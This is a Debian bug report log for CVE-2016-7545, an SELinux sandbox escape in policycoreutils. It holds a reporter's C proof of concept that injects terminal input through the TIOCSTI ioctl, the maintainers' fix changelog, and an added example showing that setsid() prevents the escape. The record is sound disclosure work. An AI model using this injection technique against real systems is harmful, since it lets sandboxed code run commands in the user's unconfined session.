Debian Bug report logs - #838599
policycoreutils: CVE-2016-7545: SELinux sandbox escape via TIOCSTI ioctl
Reported by: up201407890@alunos.dcc.fc.up.pt
Date: Thu, 22 Sep 2016 19:15:02 UTC
Severity: important
Tags: fixed-upstream, security, sid, stretch, upstream
Found in version policycoreutils/2.3-1
Fixed in version policycoreutils/2.5-3
Done: Laurent Bigonville <bigon@debian.org>
Bug is archived. No further changes may be made.
Report forwarded to debian-bugs-dist@lists.debian.org, Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org>: Bug#838599; Package policycoreutils. (Thu, 22 Sep 2016 19:15:05 GMT)
Acknowledgement sent to up201407890@alunos.dcc.fc.up.pt: New Bug report received and forwarded. Copy sent to Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org>. (Thu, 22 Sep 2016 19:15:05 GMT)
Message #5 received at submit@bugs.debian.org:
Package: policycoreutils
Severity: important
Tags: security
Hi,
When executing a program via the SELinux sandbox, the nonpriv session
can escape to the parent session by using the TIOCSTI ioctl to push
characters into the terminal's input buffer, allowing an attacker to
escape the sandbox.
$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
    char *cmd = "id\n";
    while(*cmd)
        ioctl(0, TIOCSTI, cmd++);
    execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000
context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
[saken@ghetto ~]$ id <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
This is similar to CVE-2016-2568, CVE-2016-2779, etc.
Thanks,
Federico Bento.
Changed Bug title to 'policycoreutils: CVE-2016-7545: SELinux sandbox escape via TIOCSTI ioctl' from 'policycoreutils SELinux sandbox escape via TIOCSTI ioctl'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 25 Sep 2016 13:27:04 GMT)
Added tag(s) fixed-upstream and upstream. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 25 Sep 2016 13:27:04 GMT)
Marked as found in versions policycoreutils/2.3-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 25 Sep 2016 13:27:05 GMT)
Added tag(s) stretch and sid. Request was from Laurent Bigonville <bigon@debian.org> to control@bugs.debian.org. (Tue, 27 Sep 2016 11:27:03 GMT)
Reply sent to Laurent Bigonville <bigon@debian.org>: You have taken responsibility. (Tue, 27 Sep 2016 22:33:22 GMT)
Notification sent to up201407890@alunos.dcc.fc.up.pt: Bug acknowledged by developer. (Tue, 27 Sep 2016 22:33:22 GMT)
Message #18 received at 838599-close@bugs.debian.org:
Source: policycoreutils
Source-Version: 2.5-3
We believe that the bug you reported is fixed in the latest version of
policycoreutils, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 838599@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Laurent Bigonville <bigon@debian.org> (supplier of updated policycoreutils package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
Format: 1.8
Date: Tue, 27 Sep 2016 22:30:28 +0200
Source: policycoreutils
Binary: policycoreutils policycoreutils-python-utils python-sepolicy policycoreutils-gui policycoreutils-dev policycoreutils-sandbox restorecond mcstrans newrole
Architecture: source amd64 all
Version: 2.5-3
Distribution: unstable
Urgency: medium
Maintainer: Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org>
Changed-By: Laurent Bigonville <bigon@debian.org>
Description:
mcstrans - SELinux core policy utilities (mcstrans utilities)
newrole - SELinux core policy utilities (newrole application for RBAC/MLS)
policycoreutils - SELinux core policy utilities
policycoreutils-dev - SELinux core policy utilities (development utilities)
policycoreutils-gui - SELinux core policy utilities (graphical utilities)
policycoreutils-python-utils - SELinux core policy utilities (Python utilities)
policycoreutils-sandbox - SELinux core policy utilities (graphical sandboxes)
python-sepolicy - Python binding for SELinux Policy Analyses
restorecond - SELinux core policy utilities (restorecond utilities)
Closes: 836289 838599
Changes:
policycoreutils (2.5-3) unstable; urgency=medium
.
* Team upload.
* d/p/Dont_use_subprocess_getstatusoutput_in_Python_2_code.patch: Make the
python code of chcat and sandbox compatible with both python2 and python3
* debian/NEWS, debian/control: Fix a typo
* Merge Fedora changes to the selinux-autorelabel systemd scripts and units.
We now use a selinux-autorelabel.target and a generator that override the
default.target in case we need to relabel the filesystems.
* debian/patches/sandbox-dbus-run-session.patch: Use dbus-run-session
instead of dbus-launch when available (Closes: #836289)
* debian/patches/CVE-2016-7545.patch: create a new session for sandboxed
processes (Closes: #838599 CVE-2016-7545)
* debian/patches/sandbox-gobject-gtk.patch: Use GTK+ GObject introspection
bindings instead of old pygtk2 ones
* debian/patches/sandbox-x-window-manager.patch: Use system default window
manager instead of openbox
Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 31 Oct 2016 07:31:14 GMT)
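The 2.5-3 changelog describes the fix as creating a new session for sandboxed processes. The C program below is an added example, not the policycoreutils patch or code from this bug log; child_has_ctty is a hypothetical helper. It shows the effect of that step: after setsid() the child has no controlling terminal, and Linux refuses TIOCSTI on a terminal that is not the caller's controlling terminal unless the caller holds CAP_SYS_ADMIN.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Probe: /dev/tty resolves to the caller's controlling terminal, so
 * open() fails when the process has none. O_NOCTTY makes sure the
 * probe itself never acquires a terminal. */
static int has_controlling_tty(void)
{
    int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd < 0)
        return 0;
    close(fd);
    return 1;
}

/* Hypothetical launcher step (assumption, not the project's code):
 * fork, optionally call setsid() in the child, and report whether the
 * child still has a controlling terminal.
 * Returns 1 (yes), 0 (no) or -1 (error). */
int child_has_ctty(int new_session)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* A freshly forked child is never a process-group leader,
         * so setsid() cannot fail with EPERM here. */
        if (new_session && setsid() == (pid_t)-1)
            _exit(2);
        /* A real launcher would exec the untrusted program here. */
        _exit(has_controlling_tty());
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status) ||
        WEXITSTATUS(status) > 1)
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    printf("child without setsid(): ctty=%d\n", child_has_ctty(0));
    printf("child with setsid():    ctty=%d\n", child_has_ctty(1));
    return 0;
}
```

Run from an interactive shell, the first line reports 1 and the second 0; the inherited file descriptors still point at the terminal, but it is no longer the child's controlling terminal.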
Last modified: Wed Jun 19 13:50:34 2019